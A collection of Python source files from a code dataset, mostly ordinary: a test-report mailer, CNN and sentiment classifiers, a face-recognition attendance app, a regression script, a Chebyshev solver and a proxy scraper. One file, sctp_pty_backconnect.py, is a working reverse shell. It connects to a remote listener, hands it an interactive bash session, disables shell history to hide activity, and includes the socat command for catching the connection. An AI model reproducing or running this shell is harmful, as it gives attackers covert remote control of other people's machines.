transpose\r\n","sub_path":"20200323_leetcode_892.py","file_name":"20200323_leetcode_892.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"164004095","text":"#!/usr/bin/python\n#coding:utf-8\n'''Run the test cases, generate the Excel test report and send the email'''\n\nfrom datetime import datetime\nfrom pathlib import Path\nfrom testcase import Testcase\nfrom utils import Excel,datatodict,mkdir,suite_format\nfrom log import logger\nfrom data import testsuitetodata\nfrom email.mime.application import MIMEApplication\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom Junit import Junit\nimport threading\n\nclass Autotest():\n    def __init__(self,params):\n        self.params = params\n        self.file_testcase = str(Path('testcase')/('testcase.xlsx'))\n        self.excel_testcase = Excel('r', self.file_testcase)\n        self.data = self.excel_testcase\n        self.data = datatodict(self.data)\n        self.testsuite = suite_format(self.data)\n        self.result_testuite = []\n        self.report_data={}\n        report_file = str(Path('report')/('api' + '-' + 'report' + '' +'.xlsx'))\n        self.report_workbook = Excel('w', report_file)\n        self.junit_report = str(Path('junit')/('api' + '-' + 'junit' + '' + '.xml'))\n        self.report = str(Path('report') / ('api-report.xlsx'))\n        self.send_user = '1'\n        self.password = ''\n        self.receiver_users = '@'\n        self.subject = 'python_report'\n        self.email_text = 'hi good morning'\n        self.server_address = 'smtp.email.qq.com'\n        self.mail_type = '1'\n        self.start_se_time = datetime.now()\n        self.junit = Junit(self.start_se_time)\n        self.step_fail = 0\n        self.step_error = 0\n        self.start = datetime.now()\n        files = ('report','junit','config')\n        for file in files:\n            mkdir(file)\n\n        txt_path = str(Path('config') / ('txt_final.txt'))\n        txt = open(txt_path, 'w')\n        txt.seek(0)\n        txt.truncate()\n        txt.close()\n\n    def play(self):\n        for testcase01 in self.testsuite:\n            if testcase01['condition'] == 'skip':\n                for skipcase in testcase01['step']:\n                    logger.info(skipcase)\n                    skipcase['score'] = 'skip'\n                self.result_testuite.append(testcase01)\n                continue\n            rcase = Testcase(testcase01, self.junit)\n            self.junit.case(testcase01['id'], testcase01['title'], datetime.now())\n            # run the case on a worker thread; bind rcase as a default argument so the\n            # callback keeps this iteration's case instead of a later one\n            thread = threading.Thread(target=lambda case=rcase: self.result_testuite.append(case.run()), name=testcase01['title'])\n            thread.start()\n        self.junit.write_toxnl()\n\n    def createport(self):\n        data = testsuitetodata(self.result_testuite)\n        self.report_workbook.write(data, 'report_data')\n        self.report_workbook.close()\n\n    def sendemail(self):\n        msg = MIMEMultipart()\n        msg['Subject'] = self.subject\n        msg['From'] = self.send_user\n        msg['To'] = self.receiver_users\n\n        part_text = MIMEText(self.email_text)\n        msg.attach(part_text)\n\n        part_attach1 = MIMEApplication(open(self.report, 'rb').read())\n        part_attach1.add_header('Content-Disposition', 'attachment', filename = '1911api-report.xlsx')\n        msg.attach(part_attach1)\n        smtp = smtplib.SMTP(self.server_address, 25)\n        smtp.login(self.send_user, self.password)\n        smtp.sendmail(self.send_user, self.receiver_users, msg.as_string())\n        logger.info('Success!')\n","sub_path":"mytestcase/control/autotest.py","file_name":"autotest.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"498958552","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom fake_useragent import UserAgent\nimport pymongo\nfrom multiprocessing import Pool\n\n\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb = myclient[\"ippool\"]\nmycol = mydb[\"sixsixip\"]\n\nUseragent = UserAgent()\nheaders = {\n    'User-Agent':Useragent.random,\n}\n\ndef iptest(ipadd,port):\n    url = 'https://www.baidu.com/'\n    try:\n        response = requests.get(url,headers=headers,proxies={ \"https\": \"http://{}:{}\".format(ipadd,port)},timeout = 10 )# go through the proxy\n        # print(response.status_code)\n        if response.status_code == 200:\n            print(\"working proxy\",ipadd,port)\n            mycol.update({\"ipadd\":ipadd ,\"port\":port},{'$setOnInsert': {\"ipadd\":ipadd ,\"port\":port}},upsert=True)\n            # store it if it is new, skip it if it is already there\n    except:\n        print(\"failed\")\n\ndef scrapy(url):\n    results = requests.get(url,headers=headers)\n    results.encoding = results.apparent_encoding# detect the page encoding and decode the body with it to avoid garbled text\n    soup = BeautifulSoup(results.text,features=\"lxml\")# pull the tag contents out with BeautifulSoup\n    ip_list = soup.find_all('table')[2].find_all('tr')\n    for ip in ip_list:\n        List = ip.find_all('td')\n        iptest(List[0].string,List[1].string)\n\ndef main():\n    pool = Pool()# create the process pool\n    pool.map(scrapy,['http://www.66ip.cn/{}.html'.format(i) for i in range(1,20)])\n    pool.close() # close the pool so it accepts no new work\n    pool.join() # block the main process until every worker in the pool has finished\n\n# if __name__ == \"__main__\":\n#     main()\n","sub_path":"ippool/ipspider.py","file_name":"ipspider.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"632234350","text":"#!/usr/bin/python2\n\"\"\"\nReverse Connect SCTP PTY Shell - testing version\ninfodox - insecurety.net (2013)\n\nFor an excellent listener use the following socat command:\nsocat file:`tty`,echo=0,raw sctp-listen:PORT\n\nAlternatively, use sctp_pty_shell_handler.py \n\"\"\"\nimport os\nimport pty\nimport sys\nimport socket\nfrom sctp import *\n\ndef main():\n    if len(sys.argv) < 3:\n        print(\"Usage:\\n \" + sys.argv[0] + \" \\n\")\n        exit(1)\n\n    rhost = str(sys.argv[1])\n    rport = int(sys.argv[2])\n    s = sctpsocket_tcp(socket.AF_INET)\n    s.connect((rhost, rport))\n    os.dup2(s.fileno(),0)\n    os.dup2(s.fileno(),1)\n    os.dup2(s.fileno(),2)\n    os.putenv(\"HISTFILE\",'/dev/null')\n    pty.spawn(\"/bin/bash\")\n    s.close()\n\t\nif __name__ == \"__main__\":\n    
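# executed as a script: dial back to the listener from the module docstring and hand it an interactive PTY\n    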
main()\n","sub_path":"sctp_pty_backconnect.py","file_name":"sctp_pty_backconnect.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"488186148","text":"\"\"\"This program asks the user for a year, and if the year is\nafter 1990 it tells them whether it is a leap year; otherwise it does not\"\"\"\n\nfrom bisiesto import esBisiesto\n\nanno=int(input(\"enter a year\"))\nif anno>=1990:\n    if esBisiesto(anno):\n        print(\"your year is a leap year\")\n    else:\n        print(\"your year is not a leap year\")\nelse:\n    print(\"enter a valid value, this program only says whether a year later than 1990 is a leap year\")\n\n","sub_path":"2019-uni/año_tal_bisiesto.py","file_name":"año_tal_bisiesto.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"417974935","text":"import pickle\nimport numpy as np\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\n\nnp.random.seed(2016) # for reproducibility\n\n\noutput = open('dataset.txt', 'rb')\ndata = pickle.load(output, )\n\nX_train = np.array(data['X_train'])\nX_test = np.array(data['X_test'])\ny_train = np.array(data['y_train'])\ny_test = np.array(data['y_test'])\n\nbatch_size = 64\nnb_classes = 2\nnb_epoch = 12\n\n# input image dimensions\nimg_rows, img_cols = 64, 64\n# number of convolutional filters to use\nnb_filters = 32\n# size of pooling area for max pooling\npool_size = (2, 2)\n# convolution kernel size\nkernel_size = (3, 3)\n\nX_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)\nX_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)\ninput_shape = (img_rows, img_cols, 1)\n\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\n\nY_train = np_utils.to_categorical(y_train, nb_classes)\nY_test = np_utils.to_categorical(y_test, nb_classes)\n\n\n# Set up the CNN using Keras\n\nmodel = Sequential()\n\nmodel.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1],\n                        border_mode='valid',\n                        input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1]))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=pool_size))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy',\n              optimizer='adadelta',\n              metrics=['accuracy'])\n\nmodel.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,\n          verbose=1, validation_data=(X_test, Y_test))\nscore = model.evaluate(X_test, Y_test, verbose=1)\n\nmodel.save_weights('cell_cnn_trained_weights')\n# \nprint('Test accuracy:', score[1])","sub_path":"deep_learning/cnn_cell_cycle_detection/cell_cnn.py","file_name":"cell_cnn.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"310541838","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python3.4/dist-packages/fuzzylib/fis.py\n# Compiled 
at: 2015-09-29 17:24:14\n# Size of source mod 2**32: 1779 bytes\nimport math\n\nclass FIS:\n\n def __init__(self):\n self._rules = {}\n self._variables = {}\n\n def add_rule(self, rule):\n outvar = rule.get_consequent()[0]\n if outvar not in self._rules:\n self._rules[outvar] = []\n self._rules[outvar].append(rule)\n\n def add_variable(self, var):\n self._variables[var.get_name()] = var\n\n def _process_output(self, rules, vars_values):\n outvar = self._variables[rules[0].get_consequent()[0]]\n center_num = 0\n center_den = 0\n xmin, xmax = outvar.get_range()\n x = xmin\n xstep = (xmax - xmin) / 1000\n while x < xmax:\n activation = []\n for r in rules:\n for var in vars_values:\n r.set_value(var, vars_values[var])\n\n ant = r.eval_antecedent()\n function = r.get_consequent()[1]\n activation.append(min(ant, function(x)))\n\n fx = max(activation)\n center_num += x * fx\n center_den += fx\n x += xstep\n\n try:\n value = center_num / center_den\n except ZeroDivisionError:\n value = float('inf')\n\n return value\n\n def defuzzy(self, vars_values):\n outputs = {}\n for o in self._rules:\n outputs[o] = self._process_output(self._rules[o], vars_values)\n\n return outputs","sub_path":"pycfiles/fuzzylib-0.1.1.linux-x86_64.tar/fis.cpython-34.py","file_name":"fis.cpython-34.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"57248539","text":"# -*- coding: utf-8 -*-\nimport csv\nimport random\n\nfrom helpers import tokenize\nfrom helpers import preprocess\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\n\n# Gets the training data from the file\ntrain_data_labels = []\ntrain_data = []\nwith open(\"resources/train.tsv\") as file:\n tsvreader = csv.reader(file, delimiter=\"\\t\")\n for line in tsvreader:\n train_data_labels.append(line[0])\n train_data.append(line[1])\n\n# Gets the testing data from the file\ntest_data_labels = []\ntest_data = []\nwith open(\"resources/dev.tsv\") as file:\n tsvreader = csv.reader(file, delimiter=\"\\t\")\n for line in tsvreader:\n test_data_labels.append(line[0])\n test_data.append(line[1])\n\n# Maps features to numerical vectors\nvec_train = CountVectorizer(preprocessor=lambda x: preprocess(x),\n tokenizer=lambda x: tokenize(x))\ntrain_data_vectorized = vec_train.fit_transform(train_data)\n\nvec_test = CountVectorizer(preprocessor=lambda x: preprocess(x),\n tokenizer=lambda x: tokenize(x),\n vocabulary=vec_train.vocabulary_)\ntest_data_vectorized = vec_test.fit_transform(test_data)\n\n# # Tunes parameters\n# param_grid = {\n# 'penalty': ['l2', 'l1'],\n# 'C': [0.001, 0.01, 0.1, 1, 10, 100, 1000],\n# 'fit_intercept': [True, False],\n# 'class_weight': [None, 'balanced'],\n# }\n# clf = GridSearchCV(LogisticRegression(), param_grid)\n# clf.fit(train_data_vectorized, train_data_labels)\n# print(clf.best_params_)\n\n\n# Trains logistic regression model\nlog_reg = LogisticRegression(penalty='l1', C=1.0, class_weight='balanced')\nlog_reg = log_reg.fit(X=train_data_vectorized, y=train_data_labels)\n\n# Tests logistic regression model accuracy\nlog_reg_pred = log_reg.predict(test_data_vectorized)\nprint(\"Logistic regression model accuracy: {}\".format(accuracy_score(log_reg_pred, test_data_labels)))\n\n# 
Prints confusion matrix\nprint(confusion_matrix(test_data_labels, log_reg_pred, labels=['positive', 'neutral', 'negative']))\n\n# # Prints a random sample of testing data with their label\n# j = random.randint(0, len(test_data) - 5)\n# for i in range(j, j + 5):\n# print(test_data[i])\n# print(log_reg_pred[i])\n\n# # Trains SVC\n# svc = SVC()\n# svc = svc.fit(X=train_data_vectorized, y=train_data_labels)\n#\n# # Tests SVC model accuracy\n# svc_pred = svc.predict(test_data_vectorized)\n# print(\"SVC model accuracy: {}\".format(accuracy_score(svc_pred, test_data_labels)))\n#\n#\n# # Trains Multinomial Naive Bayes\n# mn_bayes = MultinomialNB()\n# mn_bayes = mn_bayes.fit(X=train_data_vectorized, y=train_data_labels)\n#\n# # Tests Multinomial Naive Bayes\n# mn_bayes_pred = mn_bayes.predict(test_data_vectorized)\n# print(\"Multinomial Naive Bayes model accuracy: {}\".format(accuracy_score(mn_bayes_pred, test_data_labels)))\n\n","sub_path":"assignment-1/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"621710186","text":"from django.db.models import Q\nfrom django.shortcuts import render, get_object_or_404\n\nfrom common.pagination import get_page\nfrom ..models import Item, ItemAttachment, ITEM_SECTIONS, ITEM_SCHOOL_CLASSES\n\n\ndef index(request, section):\n school_class = request.GET.get('school_class')\n\n q = Q(section=section, published=True)\n if school_class:\n q &= Q(school_class=int(school_class))\n items_page = get_page(request, Item.objects.filter(q).order_by('-created'))\n current_section = filter(lambda x: x[0] == section, ITEM_SECTIONS)[0]\n return render(request, 'recommended_reading/frontend/index.html', {\n 'items_page': items_page,\n 'current_section': current_section,\n 'school_classes': ITEM_SCHOOL_CLASSES\n })\n\n\ndef detail(request, id):\n item = get_object_or_404(Item, id=id)\n attachments = ItemAttachment.objects.filter(item=item)\n return render(request, 'recommended_reading/frontend/detail.html', {\n 'item': item,\n 'attachments': attachments,\n })\n\n","sub_path":"libcms/apps/recommended_reading/frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"558734792","text":"from statistics import mean\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport pandas as pd\nimport csv\n\n\n\n\nstyle.use('fivethirtyeight')\ndatapath=\"\" #specify the data path\ndef get_path(path):\n f=open(path,'r')\n reader=csv.reader(f)\n header=next(reader)\n data=[]\n for line in reader:\n data.append([float(x) for x in line])\n return header , np.transpose(data)\nheader , data = get_path(datapath)\nxs =np.array(data[0],dtype=np.float64)\nys= np.array(data[1],dtype=np.float64)\nprint(len(xs),len(ys))\n\ndef best_fit_slope_and_intercept(xs,ys):\n m=(((mean(xs) * mean(ys))-mean(xs*ys))/((mean(xs)*mean(xs))-mean(xs*xs)))\n b=mean(ys) - m*mean(xs)\n return m,b\n\ndef squared_error(ys_orig , ys_line):\n return sum((ys_line-ys_orig)**2)\n\ndef coefficient_of_determination(ys_orig,ys_line):\n y_mean_line = [mean(ys_orig) for y in ys_orig]\n squared_error_regr = squared_error(ys_orig , ys_line)\n squared_error_y_mean = squared_error(ys_orig,y_mean_line)\n return 1-(squared_error_regr / squared_error_y_mean)\n\nm , b = best_fit_slope_and_intercept(xs,ys)\n\nregression_line = [(m*x)+b for x in xs]\n\nr_squared = 
coefficient_of_determination(ys,regression_line)\nprint(r_squared)\n\n\nplt.scatter(xs,ys)\nplt.plot(xs,regression_line)\nplt.show()\n","sub_path":"UnivariateRegression.py","file_name":"UnivariateRegression.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"408359346","text":"#!/usr/bin/python\r\nimport numpy as np\r\nimport cv2\r\nimport pandas as pd\r\nimport mysql.connector\r\nimport sys\r\nimport csv\r\nimport os\r\nfrom pandas import read_csv\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nimport openpyxl\r\nfrom PIL import Image;\r\n\r\n\r\ndb=mysql.connector.connect(host='localhost',user='root',passwd='',db='student' )\r\ncur=db.cursor()\r\n\r\n\r\n#just create a column in the csv file\r\ndef mark():\r\n mtext=ment.get()\r\n wb = openpyxl.load_workbook('attendance.xlsx')\r\n sheet = wb['Sheet1']\r\n columns = sheet.max_column+1\r\n sheet.insert_cols(columns,1)\r\n sheet.cell(row=1, column=columns).value =mtext\r\n wb.save(\"C:/xampp1/htdocs/facedetect/attendance.xlsx\")\r\n\r\n#detecting faces and marking attendance\r\ndef open_file():\r\n result= filedialog.askopenfile(initialdir = \"/xampp1/htdocs/facedetect\",title = \"Select file\",filetypes = ((\"jpeg files\",\"*.jpg\"),(\"all files\",\"*.*\")))\r\n filename = os.path.abspath(result.name)\r\n\r\n face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\n rec = cv2.face.LBPHFaceRecognizer_create()\r\n rec.read(\"trainer/trainer.yml\")\r\n my_list=[]\r\n\r\n\r\n img = cv2.imread(filename)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n # noise removal using iterative bilateral filters(removing noise and preserving edges\r\n\r\n gray = cv2.bilateralFilter(gray, 11, 17, 17)\r\n faces = face_cascade.detectMultiScale(gray, 1.5, 5)\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 255), 2)\r\n id, conf = rec.predict(gray[y:y + h, x:x + w])\r\n\r\n if conf > 75:\r\n my_list.append(id)\r\n\r\n cv2.imshow(\"detected faces\", img)\r\n cv2.waitKey(0)\r\n\r\n\r\n df1 = pd.read_excel('attendance.xlsx')\r\n\r\n row, column = df1.shape\r\n df1.loc[:, df1.columns[column - 1]] = 0\r\n for i in my_list:\r\n df1.loc[df1['ID'] == i, df1.columns[column - 1]] = 1\r\n print(df1)\r\n df1.to_csv(r'C:/xampp1/htdocs/facedetect/markedattendance.csv')\r\n\r\n\r\n#training with dataset and training the model and saving trained data in a yml file\r\ndef train():\r\n recognizer = cv2.face.LBPHFaceRecognizer_create()\r\n detector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\");\r\n path = 'C:/xampp1/htdocs/facedetect/dataset'\r\n\r\n def getImagesAndLabels(path):\r\n # get the path of all the files in the folder\r\n imagePaths = [os.path.join(path, f) for f in os.listdir(path)]\r\n # create empth face list\r\n faceSamples = []\r\n # create empty ID list\r\n Ids = []\r\n # now looping through all the image paths and loading the Ids and the images\r\n for imagePath in imagePaths:\r\n # loading the image and converting it to gray scale\r\n pilImage = Image.open(imagePath).convert('L')\r\n # Now we are converting the PIL image into numpy array\r\n imageNp = np.array(pilImage, 'uint8')\r\n # getting the Id from the image\r\n Id = int(os.path.split(imagePath)[-1].split(\".\")[1])\r\n # extract the face from the training image sample\r\n faces = detector.detectMultiScale(imageNp)\r\n # If a face is there then append that in the list as well as Id of it\r\n for (x, y, w, h) 
in faces:\r\n faceSamples.append(imageNp[y:y + h, x:x + w])\r\n Ids.append(Id)\r\n return faceSamples, Ids\r\n\r\n faces, Ids = getImagesAndLabels('dataSet')\r\n recognizer.train(faces, np.array(Ids))\r\n print(\"Successfully trained\")\r\n recognizer.write('trainer/trainer.yml')\r\n#create the attendance sheet\r\ndef create():\r\n QUERY = 'SELECT * FROM studentdetails;'\r\n cur.execute(QUERY)\r\n result = cur.fetchall()\r\n with open('dbdump01.csv', 'w', newline='') as outcsv:\r\n writer = csv.DictWriter(outcsv, fieldnames=[\"ID\", \"Name\", \"sem\",\"section\"])\r\n writer.writeheader()\r\n c = csv.writer(outcsv,quoting=csv.QUOTE_ALL)\r\n for x in result:\r\n c.writerow(x)\r\n\r\n read_file = pd.read_csv('dbdump01.csv')\r\n read_file.to_excel(r'C:\\xampp1\\htdocs\\facedetect\\attendance.xlsx', index=None, header=True)\r\n\r\n\r\n#predict student attendance\r\ndef pred():\r\n os.system('python predict.py')\r\n\r\nroot = Tk()\r\nment=StringVar()\r\n\r\n\r\nlabel_frame = LabelFrame(root, text='select an action')\r\nlabel_frame.pack(expand='yes', fill='both')\r\n#training model after registering\r\nbutton1= Button(root, text=\"train system with all registered faces\",command=train)\r\nbutton1.place(x=120, y=40)\r\n#running attendance system\r\nbutton = Button(label_frame, text=\"select an image an run face based attendance\", command=open_file)\r\nbutton.place(x=120, y=250)\r\n#create attendance sheet with registered users\r\nbutton2 = Button(label_frame, text=\"create attendance sheet\",command=create)\r\nbutton2.place(x=120, y=80)\r\n#entering attendance date\r\nbtn2 = Button(root, text='please enter date',command=mark)\r\nbtn2.place(x=150, y=170)\r\nmentry=Entry(label_frame,textvariable=ment)\r\nmentry.place(x=150,y=130)\r\nbutton3= Button(label_frame, text=\"predict student attendance\",command=pred)\r\nbutton3.place(x=150, y=300)\r\n\r\n\r\n\r\nroot.geometry(\"400x400\")\r\nroot.mainloop()\r\n\r\n\r\n\r\n","sub_path":"facedetect/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"53019425","text":"import torch.utils.data\nfrom dgl.data import tu\nimport dgl\n\nfrom core.dataloader.constants import TRAIN_RATIO, TEST_RATIO\n\n\ndef make_data_loader(batch_size, dataset_name='Letter_low', cuda=False):\n \"\"\"\n Create train/val/test dataloaders\n :param batch_size: batch size (applies for train/test/val)\n :param dataset_name: dataset name, to take from TU dortmund dataset\n (https://ls11-www.cs.tu-dortmund.de/staff/morris/graphkerneldatasets)\n :param cuda: if cuda is available\n :return: train_dataloader, val_dataloader, test_dataloader\n \"\"\"\n\n # 1. create train/val/test datasets\n dataset = tu.LegacyTUDataset(name=dataset_name)\n preprocess(dataset, cuda)\n\n train_size = int(TRAIN_RATIO * len(dataset))\n test_size = int(TEST_RATIO * len(dataset))\n val_size = int(len(dataset) - train_size - test_size)\n dataset_train, dataset_val, dataset_test = torch.utils.data.random_split(\n dataset, (train_size, val_size, test_size))\n\n # 2. 
create train/val/test dataloader\n train_dataloader = torch.utils.data.DataLoader(dataset_train,\n batch_size=batch_size,\n shuffle=True,\n collate_fn=collate\n )\n\n val_dataloader = torch.utils.data.DataLoader(dataset_val,\n batch_size=batch_size,\n shuffle=False,\n collate_fn=collate\n )\n\n test_dataloader = torch.utils.data.DataLoader(dataset_test,\n batch_size=batch_size,\n shuffle=False,\n collate_fn=collate\n )\n\n return train_dataloader, val_dataloader, test_dataloader\n\n\ndef collate(data):\n \"\"\"\n Collate function\n \"\"\"\n graphs, labels = map(list, zip(*data))\n batched = dgl.batch(graphs)\n labels = torch.LongTensor(labels)\n return batched, labels\n\n\ndef preprocess(dataset, cuda):\n \"\"\"\n Preprocess graphs by casting into FloatTensor and setting to cuda if available\n :param dataset: (LegacyTUDataset)\n :param cuda: (bool) if cuda is available\n :return:\n \"\"\"\n for g, _ in dataset:\n for key_g, val_g in g.ndata.items():\n processed = g.ndata.pop(key_g)\n processed = processed.type('torch.FloatTensor')\n if cuda:\n processed = processed.cuda()\n g.ndata[key_g] = processed\n for key_g, val_g in g.edata.items():\n processed = g.edata.pop(key_g)\n processed = processed.type('torch.FloatTensor')\n if cuda:\n processed = processed.cuda()\n g.edata[key_g] = processed\n","sub_path":"core/dataloader/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509107877","text":"# https://codility.com/programmers/lessons/7-stacks_and_queues/fish/\n# TC: O(N)\n# SC: O(1)\n# python 2.7.13\n\ndef solution(A, B):\n N = len(A)\n stack = []\n for i in range(0, N):\n if len(stack) == 0 or B[i] == 1:\n stack.append(i)\n elif B[i] == 0:\n be_eaten = False\n while len(stack) != 0 and B[stack[-1]] == 1:\n index = stack[-1]\n if A[index] < A[i]:\n stack.pop()\n continue\n else:\n be_eaten = True\n break;\n if not be_eaten:\n stack.append(i)\n return len(stack)\n\nif __name__ == '__main__':\n assert solution([4,3,2,1,5], [0,1,0,0,0]) == 2\n","sub_path":"lessons/7.stacks-and-queues/Fish.py","file_name":"Fish.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442778314","text":"from typing import Iterable, Callable, Sequence\nimport math\nimport numpy as np\nimport scipy\nimport scipy.integrate\nimport scipy.fftpack\nimport scipy.optimize\n\nfrom numpy.polynomial.chebyshev import Chebyshev\ncb = Chebyshev.basis\n\n\ndef fit_cheby(fvals: np.ndarray) -> np.ndarray:\n n = len(fvals)\n cs = scipy.fftpack.dct(fvals, type=1)\n cs /= n\n cs[0] /= 2\n return cs\n\n\nclass CSolver:\n def __init__(\n self,\n k: int,\n n: int = 128,\n n_steps: int = 15,\n grad_tol: float = 1e-8,\n verbose : bool=False\n ):\n self.k = k\n self.n = n\n self.xrs = np.cos(np.arange(n+1) * math.pi / n)\n xrs_moments = [\n cb(i)(self.xrs)\n for i in range(k)\n ]\n self.G = np.vstack(xrs_moments)\n self.verbose = verbose\n self.n_steps = n_steps\n self.grad_tol = grad_tol\n self.lambd = None\n self.f_poly = None\n\n def solve(\n self,\n d_mus:np.ndarray,\n lambd=None,\n ):\n n = self.n\n k = self.k\n\n if lambd is None:\n lambd = np.zeros(self.k)\n\n H = np.zeros(shape=(k, k))\n fpoly = None\n\n for i_step in range(self.n_steps):\n if fpoly is None:\n fvals = np.exp(lambd.dot(self.G))\n cs = fit_cheby(fvals)\n fpoly = Chebyshev(cs)\n\n e_mu = np.array([\n (fpoly*cb(i)).integ(lbnd=-1)(1)\n for i in 
range(2*k)\n            ])\n            grad = e_mu[:k] - d_mus\n            grad_norm = np.linalg.norm(grad)\n\n            grad_norm_old = grad_norm\n            Pval_old = e_mu[0] - lambd.dot(d_mus)\n\n\n            if self.verbose:\n                print(\"Step: {}, Grad: {}, P: {}\".format(\n                    i_step, grad_norm, Pval_old\n                ))\n            if grad_norm < self.grad_tol:\n                break\n\n            for i in range(k):\n                for j in range(k):\n                    H[i, j] = (e_mu[i+j] + e_mu[abs(i-j)]) / 2\n            step = -np.linalg.solve(H, grad)\n            dfdx = step.dot(grad)\n\n            stepScaleFactor = 1.0\n            newX = lambd + stepScaleFactor * step\n            alpha = .3\n            beta = .25\n\n            while True:\n                fvals = np.exp(newX.dot(self.G))\n                cs = fit_cheby(fvals)\n                fpoly = np.polynomial.chebyshev.Chebyshev(cs)\n\n                e_mu = np.array([\n                    (fpoly * cb(i)).integ(lbnd=-1)(1)\n                    for i in range(2 * k)\n                ])\n                grad = e_mu[:k] - d_mus\n                grad_norm = np.linalg.norm(grad)\n\n                Pval_new = fpoly.integ(lbnd=-1)(1) - newX.dot(d_mus)\n                delta_change = Pval_old + alpha * stepScaleFactor * dfdx - Pval_new\n\n                # if (delta_change > -1e-6 and grad_norm < grad_norm_old) or stepScaleFactor < 1e-5:\n                if (delta_change > -1e-6 or stepScaleFactor < 1e-5):\n                    break\n                else:\n                    stepScaleFactor *= beta\n                    if self.verbose:\n                        print(\"step: {}, delta: {}\".format(stepScaleFactor, delta_change))\n                    newX = lambd + stepScaleFactor * step\n\n            lambd = newX\n\n        self.lambd = lambd\n        self.f_poly = self.get_fpoly(lambd)\n        self.cdf_poly = self.f_poly.integ(lbnd=-1)\n\n    def get_fpoly(self, lambd: np.ndarray):\n        n = 256\n        cs = None\n        while n < 10000:\n            xrs = np.cos(np.arange(n + 1) * math.pi / n)\n            epoly = np.polynomial.chebyshev.Chebyshev(lambd)\n            f = np.exp(epoly(xrs))\n            cs = scipy.fftpack.dct(f, type=1)\n            eps = np.max(np.abs(cs[-3:]))\n            if eps < 1e-6:\n                cs *= 1 / (n - 1)\n                cs[0] /= 2\n                break\n            else:\n                n *= 2\n        if self.verbose:\n            print(\"Final Poly has degree: {}\".format(n))\n        fpoly = np.polynomial.chebyshev.Chebyshev(cs)\n        return fpoly\n\n    def get_pdf(self) -> Chebyshev:\n        return self.f_poly\n\n    def get_cdf(self) -> Chebyshev:\n        return self.cdf_poly\n\n    def get_quantile(self, p: float) -> float:\n        pmin = self.cdf_poly(-1)\n        pmax = self.cdf_poly(1)\n        # Compensate for slightly un-normalized cdfs\n        padj = p*(pmax - pmin) + pmin\n        if padj <= pmin:\n            return -1\n        if padj >= pmax:\n            return 1\n        res = scipy.optimize.brentq(\n            lambda x: self.cdf_poly(x) - padj,\n            -1,\n            1\n        )\n        return res\n","sub_path":"pysolver/csolver.py","file_name":"csolver.py","file_ext":"py","file_size_in_byte":4651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
